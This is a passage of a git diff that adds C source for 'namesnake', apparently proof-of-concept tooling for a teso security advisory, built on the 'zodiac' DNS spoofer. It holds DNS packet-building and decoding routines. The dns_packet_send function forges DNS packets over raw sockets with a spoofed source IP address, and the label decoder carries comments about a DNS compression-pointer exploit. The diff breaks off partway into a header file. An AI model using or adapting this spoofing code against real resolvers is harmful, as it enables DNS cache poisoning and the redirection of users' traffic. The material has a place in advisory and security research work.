+ * constructor. create new packet data body
+ *
+ * return packet data structure pointer (initialized)
+ */
+
+dns_pdata *
+dns_build_new (void)
+{
+        dns_pdata       *new;
+
+        new = xcalloc (1, sizeof (dns_pdata));
+        new->p_offset = NULL;
+        new->p_data = NULL;
+
+        return (new);
+}
+
+
+/* dns_build_destroy
+ *
+ * destructor. destroy a dns_pdata structure pointed to by `pd'
+ *
+ * return in any case
+ */
+
+void
+dns_build_destroy (dns_pdata *pd)
+{
+        if (pd == NULL)
+                return;
+
+        if (pd->p_data != NULL)
+                free (pd->p_data);
+        free (pd);
+
+        return;
+}
+
+
+/* dns_build_plen
+ *
+ * calculate the length of the current packet data body pointed to by `pd'.
+ *
+ * return the packet length
+ */
+
+u_short
+dns_build_plen (dns_pdata *pd)
+{
+        if (pd == NULL)
+                return (0);
+
+        if (pd->p_data == NULL || pd->p_offset == NULL)
+                return (0);
+
+        return ((u_short) (pd->p_offset - pd->p_data));
+}
+
+
+/* dns_build_extend
+ *
+ * extend a dns_pdata structure data part for `amount' bytes.
+ *
+ * return a pointer to the beginning of the extension
+ */
+
+unsigned char *
+dns_build_extend (dns_pdata *pd, size_t amount)
+{
+        unsigned int    u_ptr = dns_build_plen (pd);
+
+        /* realloc is your friend =)
+         */
+        pd->p_data = realloc (pd->p_data, u_ptr + amount);
+        if (pd->p_data == NULL) {
+                exit (EXIT_FAILURE);
+        }
+
+        /* since realloc can move the memory we have to calculate
+         * p_offset completely from scratch
+         */
+        pd->p_offset = pd->p_data + u_ptr + amount;
+
+        return (pd->p_data + u_ptr);
+}
+
+
+/* dns_build_ptr
+ *
+ * take a numeric quad dot notated ip address `ip_str' and build a char
+ * domain out of it within the IN-ADDR.ARPA domain.
+ *
+ * return NULL on failure
+ * return a char pointer to the converted domain name
+ */
+
+char *
+dns_build_ptr (char *ip_str)
+{
+        char    *ip_ptr;
+        int     dec[4];
+        int     n;
+
+        if (ip_str == NULL)
+                return (NULL);
+
+        /* kludge for functions that already pass a reversed string
+         */
+        if (strstr (ip_str, "in-addr.arpa"))
+                return (xstrdup (ip_str));
+
+        /* parse ip string, on failure drop conversion
+         */
+        n = sscanf (ip_str, "%d.%d.%d.%d", &dec[0], &dec[1], &dec[2], &dec[3]);
+        if (n != 4)
+                return (NULL);
+
+        /* allocate a new string of the required length
+         */
+        ip_ptr = xcalloc (1, strlen (ip_str) + strlen (".in-addr.arpa") + 1);
+        sprintf (ip_ptr, "%d.%d.%d.%d.in-addr.arpa", dec[3], dec[2], dec[1], dec[0]);
+
+        return (ip_ptr);
+}
+
+
+/* dns_build_q
+ *
+ * append a query record into a dns_pdata structure, where `dname' is the
+ * domain name that should be queried, using `qtype' and `qclass' as types.
+ *
+ * conversion of the `dname' takes place according to the value of `qtype':
+ *
+ * qtype    | expected dname format | converted to
+ * ---------+-----------------------+-----------------------------------------
+ * T_PTR   | char *, ip address    | IN-ADDR.ARPA dns domain name
+ * T_A     | char *, full hostname | dns domain name
+ * T_NS    | "                     | "
+ * T_CNAME | "                     | "
+ * T_SOA   | "                     | "
+ * T_WKS   | "                     | "
+ * T_HINFO | "                     | "
+ * T_MINFO | "                     | "
+ * T_MX    | "                     | "
+ * T_ANY   | "                     | "
+ *
+ * return (beside adding the record) the pointer to the record within the data
+ */
+
+unsigned char *
+dns_build_q (dns_pdata *pd, char *dname, u_short qtype, u_short qclass)
+{
+        unsigned char   *qdomain = NULL;
+        unsigned char   *tgt, *rp;
+        int             dlen;
+
+        switch (qtype) {
+        case (T_PTR):
+                /* convert in itself, then convert to a dns domain
+                 */
+                dname = dns_build_ptr (dname);
+                if (dname == NULL)
+                        return (NULL);
+
+        case (T_A):
+        case (T_NS):
+        case (T_CNAME):
+        case (T_SOA):
+        case (T_WKS):
+        case (T_HINFO):
+        case (T_MINFO):
+        case (T_MX):
+        case (T_TXT):
+        case (T_ANY):
+                /* convert to a dns domain
+                 */
+                dlen = dns_build_domain (&qdomain, dname);
+                if (dlen == 0)
+                        return (NULL);
+                break;
+        default:
+                return (NULL);
+        }
+
+        tgt = rp = dns_build_extend (pd, dlen + sizeof (qtype) + sizeof (qclass));
+
+        memcpy (tgt, qdomain, dlen);
+        tgt += dlen;
+        free (qdomain);
+
+        PUTSHORT (qtype, tgt);
+        PUTSHORT (qclass, tgt);
+
+        return (rp);
+}
+
+
+/* dns_build_rr
+ *
+ * append a resource record into a dns_pdata structure, pointed ty by `pd',
+ * where `dname' is the domain name the record belongs to, `type' and `class'
+ * are the type and class of the dns data part, `ttl' is the time to live,
+ * the time in seconds how long to cache the record. `rdlength' is the length
+ * of the resource data pointed to by `rdata'.
+ * depending on `type' the data at `rdata' will be converted to the appropiate
+ * type:
+ *
+ * type   | rdata points to     | will be
+ * -------+---------------------+---------------------------------------------
+ * T_A   | char IP address     | 4 byte network byte ordered IP address
+ * T_PTR | char domain name    | encoded dns domain name
+ * T_NS  | char domain name    | encoded dns domain name
+ *
+ * return (beside adding the record) the pointer to the record within the data
+ */
+
+unsigned char *
+dns_build_rr (dns_pdata *pd, unsigned char *dname, u_short type, u_short class,
+        u_long ttl, void *rdata)
+{
+        char            *ptr_ptr = NULL;
+        struct in_addr  ip_addr;                /* temporary, to convert */
+        unsigned char   *qdomain = NULL;
+        unsigned char   *tgt, *rp = NULL;
+        u_short         rdlength = 0;
+        unsigned char   *rdata_converted;       /* converted rdata */
+        int             n;
+
+        switch (type) {
+        case (T_A):
+
+                /* resolve the quad dotted IP address, then copy it into the
+                 * rdata array
+                 */
+
+                ip_addr.s_addr = net_resolve ((char *) rdata);
+                rdata_converted = xcalloc (1, sizeof (struct in_addr));
+                memcpy (rdata_converted, &ip_addr.s_addr, sizeof (struct in_addr));
+                rdlength = 4;
+
+                break;
+
+        case (T_NS):
+        case (T_CNAME):
+        case (T_PTR):
+
+                /* build a dns domain from the plaintext domain name
+                 */
+                n = dns_build_domain ((unsigned char **) &rdata_converted, (char *) rdata);
+                if (n == 0)
+                        return (NULL);
+                rdlength = n;
+
+                break;
+
+        case (T_TXT):
+
+                rdata_converted = xstrdup (rdata);
+                rdlength = strlen (rdata_converted);
+
+                break;
+
+        default:
+                return (NULL);
+        }
+
+        /* create a real dns domain from the plaintext query domain
+         */
+        switch (type) {
+        case (T_PTR):
+                ptr_ptr = dns_build_ptr (dname);
+                dname = ptr_ptr;
+        default:
+                n = dns_build_domain (&qdomain, dname);
+                if (n == 0)
+                        goto rr_fail;
+                break;
+        }
+        if (ptr_ptr != NULL)
+                free (ptr_ptr);
+
+        /* extend the existing dns packet to hold our extra rr record
+         */
+        tgt = rp = dns_build_extend (pd, dns_labellen (qdomain) + sizeof (type) +
+                sizeof (class) + sizeof (ttl) + sizeof (rdlength) + rdlength);
+
+        memcpy (tgt, qdomain, dns_labellen (qdomain));
+        tgt += dns_labellen (qdomain);
+        free (qdomain);
+
+        PUTSHORT (type, tgt);
+        PUTSHORT (class, tgt);
+        PUTLONG (ttl, tgt);
+        PUTSHORT (rdlength, tgt);
+
+        memcpy (tgt, rdata_converted, rdlength);
+        tgt += rdlength;
+
+rr_fail:
+        free (rdata_converted);
+
+        return (rp);
+}
+
+
+/* dns_build_query_label
+ *
+ * build a query label given from the data `query' that should be enclosed
+ * and the query type `qtype' and query class `qclass'.
+ * the label is passed back in printable form, not in label-length form.
+ *
+ * qtype        qclass          query
+ * -----------+---------------+-----------------------------------------------
+ * A            IN              pointer to a host- or domainname
+ * PTR          IN              pointer to a struct in_addr
+ *
+ * ... (to be extended) ...
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int
+dns_build_query_label (unsigned char **query_dst, u_short qtype, u_short qclass, void *query)
+{
+        char            label[256];
+        struct in_addr  *ip;
+
+        /* we do only internet queries (qclass is just for completeness)
+         * also drop empty queries
+         */
+        if (qclass != C_IN || query == NULL)
+                return (1);
+
+        switch (qtype) {
+        case (T_A):     *query_dst = xstrdup (query);
+                        break;
+
+        case (T_PTR):   memset (label, '\0', sizeof (label));
+                        ip = (struct in_addr *) query;
+                        net_printipr (ip, label, sizeof (label) - 1);
+                        scnprintf (label, sizeof (label), ".in-addr.arpa");
+                        *query_dst = xstrdup (label);
+                        break;
+        default:        return (1);
+                        break;
+        }
+
+        return (0);
+}
+
+
+/* dns_build_domain
+ *
+ * build a dns domain label sequence out of a printable domain name
+ * store the resulting domain in `denc', get the printable domain
+ * from `domain'.
+ *
+ * return 0 on failure
+ * return length of the created domain (include suffixing '\x00')
+ */
+
+int
+dns_build_domain (unsigned char **denc, char *domain)
+{
+        char    *start = domain,
+                *out,
+                c = '\0';
+        int     n = strlen (domain);
+
+        if (n > MAXDNAME)
+                return (0);
+
+        out = *denc = xcalloc (1, n + 2);
+
+        domain += n - 1;
+        out += n + 1;
+        *out-- = 0;
+
+        n = 0;
+
+        while (domain >= start) {
+                c = *domain--;
+                if (c == '.') {
+                        *out-- = n;
+                        n = 0;
+                } else {
+                        *out-- = c;
+                        n++;
+                }
+        }
+
+        if (n != '\0')
+                *out-- = n;
+
+        return (strlen (out + 1) + 1);
+}
+
+
+/* dns_build_domain_dotlen
+ *
+ * helper routine, determine the length of the next label in a human
+ * printed domain name
+ *
+ * return the number of characters until an occurance of \x00 or '.'
+ */
+
+int
+dns_build_domain_dotlen (char *label)
+{
+        int     n;
+
+        /* determine length
+         */
+        for (n = 0; *label != '.' && *label != '\x00'; n++, ++label)
+                ;
+
+        return (n);
+}
+
+
+/* dns_packet_send
+ *
+ * send a prepared dns packet spoofing from `ip_src' to `ip_dst', using
+ * source port `prt_src' and destination port `prt_dst'. the dns header
+ * data is filled with `dns_id', the dns identification number of the
+ * packet, `flags', which are the 16bit flags in the dns header, then
+ * four count variables, each for a dns segment: `count_q' is the number
+ * of queries, `count_a' the number of answers, `count_ns' the number of
+ * nameserver entries and `count_ad' the number of additional entries.
+ * the real dns data is aquired from `dbuf', `dbuf_s' bytes in length.
+ * the dns data should be constructed using the dns_build_* functions.
+ * if the packet should be compressed before sending it, `compress'
+ * should be set to 1.
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int
+dns_packet_send (char *ip_src, char *ip_dst, u_short prt_src, u_short prt_dst,
+        u_short dns_id, u_short flags, u_short count_q, u_short count_a,
+        u_short count_ns, u_short count_ad, dns_pdata *pd)
+{
+        int             sock;           /* raw socket, yeah :) */
+        int             n;              /* temporary return value */
+        unsigned char   buf[4096];      /* final packet buffer */
+        unsigned char   *dbuf = pd->p_data;
+        size_t          dbuf_s = dns_build_plen (pd);
+        struct in_addr  s_addr,
+                        d_addr;
+
+
+        s_addr.s_addr = net_resolve (ip_src);
+        d_addr.s_addr = net_resolve (ip_dst);
+
+        libnet_build_dns (      dns_id,         /* dns id (the famous one, 'antilove'd by many users ;) */
+                                flags,          /* standard query response */
+                                count_q,        /* count for query */
+                                count_a,        /* count for answer */
+                                count_ns,       /* count for authoritative information */
+                                count_ad,       /* count for additional information */
+                                dbuf,           /* buffer with the queries/rr's */
+                                dbuf_s,         /* query size */
+                                buf + IP_H + UDP_H);            /* write into packet buffer */
+
+        libnet_build_udp (      prt_src,        /* source port */
+                                prt_dst,        /* 53 usually */
+                                NULL,           /* content already there */
+                                DNS_H + dbuf_s, /* same */
+                                buf + IP_H);    /* build after ip header */
+
+        libnet_build_ip (       UDP_H + DNS_H + dbuf_s, /* content size */
+                                0,              /* tos */
+                                libnet_get_prand (PRu16),       /* id :) btw, what does 242 mean ? */
+                                0,              /* frag */
+                                64,             /* ttl */
+                                IPPROTO_UDP,    /* subprotocol */
+                                s_addr.s_addr,  /* spoofa ;) */
+                                d_addr.s_addr,  /* local dns querier */
+                                NULL,           /* payload already there */
+                                0,              /* same */
+                                buf);           /* build in packet buffer */
+
+        libnet_do_checksum (buf, IPPROTO_UDP, UDP_H + DNS_H + dbuf_s);
+        libnet_do_checksum (buf, IPPROTO_IP, IP_H);
+
+        sock = libnet_open_raw_sock(IPPROTO_RAW);
+        if (sock == -1)
+                return (1);
+
+        n = libnet_write_ip (sock, buf, UDP_H + IP_H + DNS_H + dbuf_s);
+        if (n < UDP_H + IP_H + DNS_H + dbuf_s) {
+                return (1);
+        }
+
+        close (sock);
+
+        return (0);
+}
+
+
diff --git a/advisories/teso-advisory-003/namesnake/src/dns-build.h b/advisories/teso-advisory-003/namesnake/src/dns-build.h
new file mode 100644
index 0000000..ca3fe9c
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/dns-build.h
@@ -0,0 +1,211 @@
+/* namesnake
+ *
+ * dns packet builder routines include file
+ *
+ * by scut / teso
+ */
+
+#ifndef Z_DNS_BUILD_H
+#define Z_DNS_BUILD_H
+
+
+/* dns_pdata
+ *
+ * domain name service packet data part structure.
+ * the data in this structure is the virtual dns packet to fire.
+ */
+
+typedef struct  dns_pdata {
+        unsigned char   *p_offset;      /* internal offset to construct packet data */
+        unsigned char   *p_data;        /* real packet data pointer */
+} dns_pdata;
+
+
+/* dns_build_random
+ *
+ * prequel the domain name `domain' with a random sequence of characters
+ * with a random length if `len' is zero, and a fixed length if len is != 0
+ *
+ * return the allocated new string
+ */
+
+char            *dns_build_random (char *domain, size_t len);
+
+/* dns_domain
+ *
+ * return a pointer to the beginning of the SLD within a full qualified
+ * domain name `domainname'.
+ *
+ * return NULL on failure
+ * return a pointer to the beginning of the SLD on success
+ */
+
+char            *dns_domain (char *domainname);
+char            *dns_ptr_domain (char *arpaname);
+
+
+/* dns_build_new
+ *
+ * constructor. create new packet data body
+ *
+ * return packet data structure pointer (initialized)
+ */
+
+dns_pdata       *dns_build_new (void);
+
+
+/* dns_build_destroy
+ *
+ * destructor. destroy a dns_pdata structure pointed to by `pd'
+ *
+ * return in any case
+ */
+
+void            dns_build_destroy (dns_pdata *pd);
+
+
+/* dns_build_plen
+ *
+ * calculate the length of the current packet data body pointed to by `pd'.
+ *
+ * return the packet length
+ */
+
+u_short         dns_build_plen (dns_pdata *pd);
+
+
+/* dns_build_extend
+ *
+ * extend a dns_pdata structure data part for `amount' bytes.
+ *
+ * return a pointer to the beginning of the extension
+ */
+
+unsigned char   *dns_build_extend (dns_pdata *pd, size_t amount);
+
+
+/* dns_build_ptr
+ *
+ * take a numeric quad dot notated ip address `ip_str' and build a char
+ * domain out of it within the IN-ADDR.ARPA domain.
+ *
+ * return NULL on failure
+ * return a char pointer to the converted domain name
+ */
+
+char            *dns_build_ptr (char *ip_str);
+
+
+/* dns_build_q
+ *
+ * append a query record into a dns_pdata structure, where `dname' is the
+ * domain name that should be queried, using `qtype' and `qclass' as types.
+ *
+ * conversion of the `dname' takes place according to the value of `qtype':
+ *
+ * qtype    | expected dname format | converted to
+ * ---------+-----------------------+-----------------------------------------
+ * TY_PTR   | char *, ip address    | IN-ADDR.ARPA dns domain name
+ * TY_A     | char *, full hostname | dns domain name
+ * TY_NS    | "                     | "
+ * TY_CNAME | "                     | "
+ * TY_WKS   | "                     | "
+ * TY_HINFO | "                     | "
+ * TY_MINFO | "                     | "
+ * TY_MX    | "                     | "
+ *
+ * return (beside adding the record) the pointer to the record within the data
+ */
+
+unsigned char   *dns_build_q (dns_pdata *pd, char *dname, u_short qtype, u_short qclass);
+
+
+/* dns_build_rr
+ *
+ * append a resource record into a dns_pdata structure, pointed ty by `pd',
+ * where `dname' is the domain name the record belongs to, `type' and `class'
+ * are the type and class of the dns data part, `ttl' is the time to live,
+ * the time in seconds how long to cache the record. `rdlength' is the length
+ * of the resource data pointed to by `rdata'.
+ * depending on `type' the data at `rdata' will be converted to the appropiate
+ * type:
+ *
+ * type   | rdata points to     | will be
+ * -------+---------------------+---------------------------------------------
+ * TY_A   | char IP address     | 4 byte network byte ordered IP address
+ * TY_PTR | char domain name    | encoded dns domain name
+ * TY_NS  | char domain name    | encoded dns domain name
+ *
+ * return (beside adding the record) the pointer to the record within the data
+ */
+
+unsigned char   *dns_build_rr (dns_pdata *pd, unsigned char *dname,
+        u_short type, u_short class, u_long ttl, void *rdata);
+
+
+/* dns_build_query_label
+ *
+ * build a query label given from the data `query' that should be enclosed
+ * and the query type `qtype' and query class `qclass'.
+ *
+ * qtype        qclass          query
+ * -----------+---------------+-----------------------------------------------
+ * A            IN              pointer to a host- or domainname
+ * PTR          IN              pointer to a struct in_addr
+ *
+ * ... (to be extended) ...
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+int             dns_build_query_label (unsigned char **query_dst, u_short qtype, u_short qclass, void *query);
+
+
+/* dns_build_domain
+ *
+ * build a dns domain label sequence out of a printable domain name
+ * store the resulting domain in `denc', get the printable domain
+ * from `domain'.
+ *
+ * return 0 on failure
+ * return length of the created domain (include suffixing '\x00')
+ */
+
+int             dns_build_domain (unsigned char **denc, char *domain);
+
+
+/* dns_build_domain_dotlen
+ *
+ * helper routine, determine the length of the next label in a human
+ * printed domain name
+ *
+ * return the number of characters until an occurance of \x00 or '.'
+ */
+
+int             dns_build_domain_dotlen (char *label);
+
+
+/* dns_packet_send
+ *
+ * send a prepared dns packet spoofing from `ip_src' to `ip_dst', using
+ * source port `prt_src' and destination port `prt_dst'. the dns header
+ * data is filled with `dns_id', the dns identification number of the
+ * packet, `flags', which are the 16bit flags in the dns header, then
+ * four count variables, each for a dns segment: `count_q' is the number
+ * of queries, `count_a' the number of answers, `count_ns' the number of
+ * nameserver entries and `count_ad' the number of additional entries.
+ * the real dns data is aquired from the dns packet data `pd'.
+ * the dns data should be constructed using the dns_build_* functions.
+ * if the packet should be compressed before sending it, `compress'
+ * should be set to 1.
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int             dns_packet_send (char *ip_src, char *ip_dst, u_short prt_src, u_short prt_dst,
+                        u_short dns_id, u_short flags, u_short count_q, u_short count_a,
+                        u_short count_ns, u_short count_ad, dns_pdata *pd);
+
+#endif
+
diff --git a/advisories/teso-advisory-003/namesnake/src/dns.c b/advisories/teso-advisory-003/namesnake/src/dns.c
new file mode 100644
index 0000000..c2c8c10
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/dns.c
@@ -0,0 +1,447 @@
+/* zodiac - advanced dns spoofer
+ *
+ * by scut / teso
+ *
+ * dns handling routines
+ *
+ * including scut's leet dns packet decoder *welp* :-D
+ *
+ */
+
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include "common.h"
+#include "dns.h"
+
+
+extern char *   ns_domain;
+
+static char     *types[] = {    NULL, "A", "NS", "MD", "MF", "CNAME", "SOA", "MB", "MG",
+                                "MR", "NULL", "WKS", "PTR", "HINFO", "MINFO", "MX", "TXT" };
+static char     *rcodes[] = {   "OK", "EFORM", "EFAIL", "ENAME", "ENIMP", "ERFSD", NULL, NULL,
+                                NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL };
+
+
+/* dns_handle
+ *
+ * handle a dns packet with header pointed to by `dns_hdr' and data pointed
+ * to by `dns_data'.
+ *
+ * do all necessary queue / decoding stuff
+ */
+
+void
+dns_handle (dns_hdr *dns, unsigned char *dns_data, unsigned int plen, int print)
+{
+        int             n;                      /* temporary return value */
+        unsigned char   *d_quer[SEG_COUNT_MAX]; /* query array */
+        unsigned char   *d_answ[SEG_COUNT_MAX]; /* answer array */
+        unsigned char   *d_auth[SEG_COUNT_MAX]; /* authority array */
+        unsigned char   *d_addi[SEG_COUNT_MAX]; /* additional array */
+        char            dns_p[2048];            /* output (for humans :) */
+
+#ifdef  PDEBUG
+        hexdump ("packet-dns", (unsigned char *) dns, 256);
+#endif
+        /* segmentify dns packet
+         */
+        n = dns_segmentify (dns, dns_data, d_quer, d_answ, d_auth, d_addi);
+        if (n != 0) {
+                printf ("FAILURE ON DNS PACKET DISASSEMBLY\n");
+                return;
+        }
+
+        memset (dns_p, '\0', sizeof (dns_p));
+
+        /* only print own packets if dns_print_own_packets is 1
+         */
+        dns_printpkt (dns_p, sizeof (dns_p) - 1, dns,
+                dns_data, d_quer, d_answ, d_auth, d_addi, print);
+
+        /* return
+         */
+        return;
+} 
+
+
+/* dns_p_print
+ *
+ * decode a dns packet pointed to by `dns' and `dns_data' to a human readable
+ * form to the string pointed to by `os', with a maximum length of `len'
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int
+dns_p_print (char *os, size_t len, dns_hdr *dns, unsigned char *d_quer[], unsigned char *d_answ[],
+        unsigned char *d_auth[], unsigned char *d_addi[])
+{
+        int     n;
+
+        scnprintf (os, len, "ID[%04x] TYPE[", ntohs (dns->id));
+
+        if (dns->qr == 0) {
+                /* print the query
+                 */
+                if (dns->opcode != 0 && dns->opcode != 1) {
+                        scnprintf (os, len, "unsupported opcode %02x %s", dns->opcode,
+                                (dns->opcode == 3) ? "ST]" : "");
+                } else {
+                        if (dns->opcode == 0)
+                                scnprintf (os, len, " Q]");
+                        else if (dns->opcode == 1)
+                                scnprintf (os, len, "IQ]");
+                }
+        } else if (dns->qr == 1) {
+                char    *rcstr = NULL;
+
+                /* authoritative answer ?
+                 */
+                if (dns->aa == 1)
+                        scnprintf (os, len, "AA]");
+                else
+                        scnprintf (os, len, " A]");
+
+                rcstr = rcodes[dns->rcode];
+                scnprintf (os, len, "(%s)", (rcstr == NULL) ? "?" : rcstr);
+        }
+
+        for (n = 0; n < ntohs (dns->qdcount) && n < SEG_COUNT_MAX; n++) {
+                if (n == 0)
+                        scnprintf (os, len, " Q(%hu)> ", ntohs (dns->qdcount));
+                dns_p_q ((unsigned char *) dns, os, len, d_quer[n]);
+        }
+
+        return (0);
+}
+
+
+/* dns_p_q
+ *
+ * print a dns query record pointed to by `wp' as a human readable string,
+ * and append it to `os', which can have a maximum size of `len' characters.
+ */
+
+void
+dns_p_q (unsigned char *dns_start, char *os, size_t len, unsigned char *wp)
+{
+        char            qname[256];
+        char            *qt;
+        u_short         qtype, qclass;
+
+        memset (qname, '\0', sizeof (qname));
+        dns_dcd_label (dns_start, &wp, qname, sizeof (qname) - 1, 5);
+
+        /* get query type and class
+         */
+        GETSHORT (qtype, wp);
+        GETSHORT (qclass, wp);
+
+        if (qtype <= 16)
+                qt = types[qtype];
+        else
+                qt = NULL;
+
+        ns_domain = xstrdup (qname);
+        scnprintf (os, len, "%s [t:%s]", qname, (qt != NULL) ? qt : "-");
+
+        return;
+}
+
+
+/* dns_p_rdata
+ *
+ * print a resource record rdata field pointed to by `rdp' as a human readable
+ * string `rdstr' with a maximum length `len', depending on rdata type `rtype'
+ * the data pointed to by `rdp' has the length `rdlen'.
+ *
+ * return nothing
+ */
+
+void
+dns_p_rdata (unsigned char *dns_start, char *rdstr, size_t len,
+        u_short rtype, unsigned char *rdp, u_short rdlen)
+{
+        char            *ips;
+        char            ipv4str[64];    /* temporary IP address string */
+        struct in_addr  ip;
+        unsigned char   *wps = rdp;
+
+        memset (rdstr, '\0', len);
+
+        switch (rtype) {
+        case (T_A):
+                memcpy (&ip, rdp, sizeof (struct in_addr));
+
+                ips = ipv4_print (ipv4str, ip, 0);
+                scnprintf (rdstr, len, "%s", ips);
+
+                break;
+
+        case (T_CNAME):
+        case (T_NS):
+        case (T_PTR):
+                dns_dcd_label (dns_start, &wps, rdstr, len, 5);
+                break;
+
+        default:
+                break;
+        }
+
+        return;
+}
+
+
+/* dns_p_rr
+ *
+ * print a dns resource record pointed to by `wp' as a human readable string,
+ * and append it to `os', which can have a maximum size of `len' characters.
+ */
+
+void
+dns_p_rr (unsigned char *dns_start, char *os, size_t len, unsigned char *wp)
+{
+        char    name[256], rdatas[256];
+        char    *t;
+        u_short type, class, rdlen;
+        u_long  ttl;
+
+        /* decode label
+         */
+        memset (name, '\0', sizeof (name));
+        dns_dcd_label (dns_start, &wp, name, sizeof (name), 5);
+
+        /* get type/class/ttl/rdlength/rdata
+         * then assign appropiate type description
+         */
+        GETSHORT (type, wp);
+        GETSHORT (class, wp);
+        GETLONG (ttl, wp);
+        GETSHORT (rdlen, wp);
+        t = (type <= 16) ? types[type] : NULL;
+
+        /* add decoded rdata info into rdatas
+         * different decoding depending on type
+         */
+        dns_p_rdata (dns_start, rdatas, sizeof (rdatas), type, wp, rdlen);
+
+        scnprintf (os, len, "[t: %s (%04x)][c: %04x][ttl: %lu][r: %04x] %s : %s",
+                (t != NULL) ? t : "-", type, class, ttl, rdlen, name, rdatas);
+
+        return;
+}
+
+
+/* dns_segmentify
+ *
+ * segmentify a dns datagram pointed to by `dns_hdr' and `dns_data' into it's
+ * different parts, such as the query part (pointed to by `d_quer'), the
+ * answer part (pointed to by `d_answ'), the authoritaty (pointed to by
+ * `d_auth') and the additional information parts (pointed to by `d_addi').
+ *
+ * return 0 on success, and fill all the **-pointers to either NULL or data
+ *                      within the `dns_data' array.
+ */
+
+int
+dns_segmentify (dns_hdr *dns, unsigned char *dns_data,
+        unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
+        unsigned char *d_addi[])
+{
+        unsigned char   *wp;    /* work pointer */
+
+        wp = dns_data;
+
+        /* get queries, answers, authorities and additional information
+         */
+        dns_seg_q (&wp, d_quer, htons (dns->qdcount), SEG_COUNT_MAX);
+        dns_seg_rr (&wp, d_answ, htons (dns->ancount), SEG_COUNT_MAX);
+        dns_seg_rr (&wp, d_auth, htons (dns->nscount), SEG_COUNT_MAX);
+        dns_seg_rr (&wp, d_addi, htons (dns->arcount), SEG_COUNT_MAX);
+
+        return (0);
+}
+
+
+/* dns_seg_q
+ *
+ * segmentify a query record of a dns datagram, starting at `wp', creating
+ * an array of `c' number of pointers in `d_arry', truncating if it exceeds
+ * a number of `max_size' records
+ */
+
+void
+dns_seg_q (unsigned char **wp, unsigned char *d_arry[], int c, int max_size)
+{
+        int     count;
+
+        for (count = 0; count < c && count < max_size; count++) {
+                d_arry[count] = *wp;
+                *wp += dns_labellen (*wp);      /* skip label */
+                *wp += 2 * sizeof (u_short);    /* skip qtype/qclass */
+        }
+}
+
+
+/* dns_seg_rr
+ *
+ * segmentify a resource record of a dns datagram, starting at `wp', creating
+ * an array of `c' number of pointers in `d_arry', truncating if it exceeds
+ * a number of `max_size' records
+ */
+
+void
+dns_seg_rr (unsigned char **wp, unsigned char *d_arry[], int c, int max_size)
+{
+        int                     count;
+        unsigned long int       rdlen;
+
+        for (count = 0; count < c && count < max_size; count++) {
+                d_arry[count] = *wp;
+
+                /* skip the label (most likely compressed)
+                 */
+                *wp += dns_labellen (*wp);
+
+                /* skip the type, class, ttl
+                 */
+                *wp += 8 * sizeof (u_char);
+
+                /* resource data length
+                 */
+                GETSHORT (rdlen, *wp);
+                *wp += rdlen;
+        }
+
+        return;
+}
+
+
+/* dns_labellen
+ *
+ * determine the length of a dns label pointed to by `wp'
+ *
+ * return the length of the label
+ */
+
+int
+dns_labellen (unsigned char *wp)
+{
+        unsigned char   *wps = wp;
+
+        while (*wp != '\x00') {
+                /* in case the label is compressed we don't really care,
+                 * but just skip it
+                 */
+                if ((*wp & INDIR_MASK) == INDIR_MASK) {
+                        wp += sizeof (u_short);
+
+                        /* non-clear RFC at this point, got to figure with some
+                         * real dns packets
+                         */
+                        return ((int) (wp - wps));
+                } else {
+                        wp += (*wp + 1);
+                }
+        }
+
+        return ((int) (wp - wps) + 1);
+}
+
+
+/* dns_dcd_label
+ *
+ * decode a label sequence pointed to by `qname' to a string pointed to by
+ * `os', with a maximum length of `len' characters
+ * after successful decoding it will update *qname, to point to the qtype
+ * if the `dig' flag is > 0 the routine may allow to call itself recursively
+ * at a maximum dig level of `dig'.
+ * if `dig' is zero it is a recursive call and may not call itself once more.
+ * `dns_start' is a pointer to the beginning of the dns packet, to allow
+ * compressed labels to be decoded.
+ *
+ * return 0 on success
+ * return 1 on failure
+ */
+
+int
+dns_dcd_label (unsigned char *dns_start, unsigned char **qname, char *os, size_t len, int dig)
+{
+        unsigned char   *qn = *qname;
+
+        while (*qn != '\0') {
+                if ((*qn & INDIR_MASK) == INDIR_MASK) {
+                        int             offset; /* compression offset */
+                        unsigned char   *tpt;   /*temporary pointer */
+
+                        if (dig == 0) {
+                                if (dns_start == NULL)
+                                        return (1);
+
+                                printf ("DNS attack, compr. flaw exploit attempt\n");
+                                return (1);
+                        }
+
+                        /* don't fuck with big bad endian
+                         */
+                        
+                        offset = (((unsigned char) *qn) & ~0xc0) << 8;
+                        qn += 1;
+                        offset += (int) ((unsigned char) *qn);
+                        qn += 1;
+
+                        /* recursivly decode the label pointed to by the offset
+                         * exploit here =)
+                         */
+                        
+                        tpt = dns_start + offset;
+                        *qname = qn;
+
+                        return (dns_dcd_label (dns_start, &tpt, os, len, dig - 1));
+
+                } else {
+                        char    label[65];
+
+                        memset (label, '\0', sizeof (label));
+                        memcpy (label, qn + 1, (*qn & ~INDIR_MASK));
+                        scnprintf (os, len, "%s", label);
+                }
+
+                qn += *qn + 1;
+                if (*qn != 0)
+                        scnprintf (os, len, ".");
+        }
+
+        *qname = qn + 1;
+
+        return (0);
+}
+
+/* dns_printpkt
+ *
+ * print dns packet header pointed to by `dns' in human readable form
+ * to dns window
+ *
+ * return nothing
+ */
+
+void
+dns_printpkt (char *os, size_t osl, dns_hdr *dns, unsigned char *data,
+        unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
+        unsigned char *d_addi[], int print)
+{
+        /* print decoded dns packet to screen
+         */
+        dns_p_print (os, osl, dns, d_quer, d_answ, d_auth, d_addi);
+        if (print == 1)
+                printf ("%s\n", os);
+
+        return;
+}
+
diff --git a/advisories/teso-advisory-003/namesnake/src/dns.h b/advisories/teso-advisory-003/namesnake/src/dns.h
new file mode 100644
index 0000000..2445231
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/src/dns.h
@@ -0,0 +1,67 @@
+/* zodiac - advanced dns spoofer
+ *
+ * by scut / teso
+ *
